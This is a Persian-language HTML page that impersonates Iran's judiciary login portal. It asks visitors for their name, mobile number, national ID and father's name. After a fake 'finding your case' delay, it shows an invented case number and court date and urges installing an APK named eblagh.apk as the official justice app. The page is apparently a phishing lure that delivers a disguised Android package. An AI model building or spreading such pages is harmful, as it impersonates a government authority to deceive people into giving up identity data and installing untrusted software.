<!DOCTYPE html>
<html lang="fa">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <title>ورود به سامانه قضائی</title>
    <style>
        @font-face {
            font-family: 'Iran';
            src: url('font/iran.ttf') format('truetype');
        }
        body {
            font-family: 'Iran', sans-serif;
            background-color: #ffffff;
            height: 100%;
            width: 100%;
            margin: 0;
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            direction: rtl;
            overflow: hidden;
        }
        .logo {
            text-align: center;
            margin-bottom: 15px;
        }
        .logo img {
            width: 100px;
        }
        .logo-text {
            font-size: 15px;
            margin-top: 10px;
            margin-bottom: 15px;
            font-weight: bold;
            text-align: center;
            color: #808080;
        }
        .input-group {
            position: relative;
            margin-bottom: 10px;
            width: 85%;
            max-width: 300px;
        }
        .input-group input {
            width: 100%;
            padding: 10px 40px 10px 10px;
            border: 1px solid #ccc;
            border-radius: 25px;
            box-sizing: border-box;
            font-size: 14px;
            font-family: 'Iran', sans-serif;
        }
        .input-group img {
            position: absolute;
            right: 10px;
            top: 71%;
            transform: translateY(-50%);
            width: 25px;
        }
        label {
            display: block;
            margin-bottom: 10px;
            font-size: 18px;
            font-weight: bold;
        }
        .info-text {
            font-size: 14px;
            margin-bottom: 7px;
            text-align: center;
        }
        .privacy {
            text-align: center;
            margin-top: 10px;
        }
        .privacy a {
            color: #0000ff;
            text-decoration: underline;
            font-weight: bold;
            font-size: 12px;
        }
        .submit-btn {
            text-align: center;
            width: 250px;
            margin-top: 20px;
        }
        .submit-btn img {
            width: 100%;
        }

        .modal {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0.7);
            display: flex;
            justify-content: center;
            align-items: center;
            z-index: 9999;
            display: none;
        }
        .modal-content {
            background-color: white;
            padding: 20px;
            border-radius: 15px;
            text-align: center;
            width: 300px;
            animation: fadeIn 1s;
            margin-top: 20px; /* کمی پایین‌تر آوردن متن پنجره دوم */
        }

        @keyframes fadeIn {
            from { opacity: 0; }
            to { opacity: 1; }
        }

        @keyframes fadeOut {
            from { opacity: 1; }
            to { opacity: 0; }
        }

        .install-btn {
            margin-top: 36px;
        }
        .install-btn img {
            width: 200px;
        }
    </style>
</head>
<body>

    <div class="logo">
        <img src="im/logo.png" alt="لوگو">
        <div class="logo-text">ورود به سامانه قضائی</div>
    </div>

    <div class="input-group">
        <label for="name">نام و نام خانوادگی</label>
        <input type="text" id="name" placeholder="نام و نام خانوادگی">
        <img src="im/1.png" alt="آیکون نام">
    </div>

    <div class="input-group">
        <label for="phone">تلفن همراه</label>
        <input type="text" id="phone" placeholder="۰۹۱۲۳۴۵۶۷۸۹">
        <img src="im/2.png" alt="آیکون تلفن">
    </div>

    <div class="input-group">
        <label for="code">کد ملی</label>
        <input type="text" id="code" placeholder="۱۲۳۴۵۶۷۸۹۰">
        <img src="im/3.png" alt="آیکون کد ملی">
    </div>

    <div class="input-group">
        <label for="father-name">نام پدر</label>
        <input type="text" id="father-name" placeholder="نام پدر">
        <img src="im/4.png" alt="آیکون نام پدر">
    </div>

    <div class="info-text">اطلاعات خواسته شده را به درستی وارد کنید</div>

    <div class="privacy">
        <a href="#">مطالعه بیانیه حریم خصوصی</a>
    </div>

    <div class="submit-btn">
        <a href="#"><img src="im/dok.png" alt="تایید" onclick="showFindingCase()"></a>
    </div>

    <div id="finding-case" class="modal">
        <div class="modal-content">
            <p id="finding-text">درحال یافتن پرونده شما لطفا شکیبا باشید</p>
        </div>
    </div>

    <div id="case-info" class="modal">
        <div class="modal-content">
            <p>پرونده 1404733482 در شعبه 12 دادگستری</p>
            <p>اطلاعات پرونده: ******</p>
            <p>تاریخ حضور در دادگاه: 1403/6/28</p>
            <p>برای پیگیری این پرونده اپلیکیشن عدالت من را از لینک زیر نصب نموده و سپس برای پیگیری اقدام فرمایید.</p>
            <div class="install-btn">
                <a href="app/eblagh.apk"><img src="im/install.png" alt="نصب اپلیکیشن"></a>
            </div>
        </div>
    </div>

    <script>
        function showFindingCase() {
            document.getElementById('finding-case').style.display = 'flex';
            
            setTimeout(() => {
                document.getElementById('finding-case').style.animation = 'fadeOut 1s';
                setTimeout(() => {
                    document.getElementById('finding-case').style.display = 'none';
                    document.getElementById('case-info').style.display = 'flex'; 
                }, 1000);
            }, 5000);
        }
    </script>

</body>
</html>